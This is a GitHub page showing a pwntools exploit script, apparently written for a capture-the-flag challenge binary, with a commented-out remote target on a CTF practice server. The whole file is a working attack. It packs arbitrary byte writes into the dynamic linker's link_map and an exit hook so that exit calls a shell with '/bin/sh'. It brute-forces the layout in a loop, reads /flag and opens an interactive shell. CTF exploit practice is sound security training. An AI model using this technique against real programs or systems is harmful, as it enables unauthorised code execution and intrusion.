-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathnew_exp.py
70 lines (56 loc) · 1.5 KB
/
new_exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#!/usr/bin/env python3
from pwn import *
# context.log_level = "debug"
p_addr = lambda name, addr: print(f"{name}: {hex(addr)}")
ru = lambda s: p.recvuntil(s)
rut = lambda s, t: p.recvuntil(s, timeout=t)
r = lambda n: p.recv(n)
sla = lambda d, b: p.sendlineafter(d, b)
sa = lambda d, b: p.sendafter(d, b)
sl = lambda s: p.sendline(s)
sls = lambda s: p.sendline(str(s).encode())
ss = lambda s: p.send(str(s).encode())
s = lambda s: p.send(s)
uu64 = lambda data: u64(data.ljust(8, b"\x00"))
it = lambda: p.interactive()
def write_one(addr, data):
tmp = b""
for i in range(len(data)):
tmp += p64(addr + i) + p8(data[i])
return tmp
p = process("./pwn")
# io = remote("node4.buuoj.cn", 29129)
ld = 0x265000 - 0x10
# ld = 0x26b000 - 0x10
link_base_addr = ld + 0x1190
link_dyn_str = link_base_addr + 0x68
fake_str = ld + 0x1160
exit_hook = ld + 0xF68
exit_hook_rdi = ld + 0x968
write_st_name = 62
payload = b""
payload += p64(link_base_addr) + p8(0x18)
str_ = b"\x90\x62\xb6"
# str_ = b"\x90\x72\xe2"
payload += write_one(exit_hook, str_)
str_ = b"/bin/sh\x00"
payload += write_one(exit_hook_rdi, str_)
str_ = b"exit\x00"
payload += write_one(fake_str + write_st_name, str_)
payload += p64(link_dyn_str) + p8(0xB8)
count = 0
while True:
try:
p = process("./pwn")
s(payload)
sl(b"echo ok")
p.recvuntil(b"ok")
sl(b"cat /flag")
p.interactive()
break
except Exception as e:
p.close()
count += 1
print(count)
continue
it()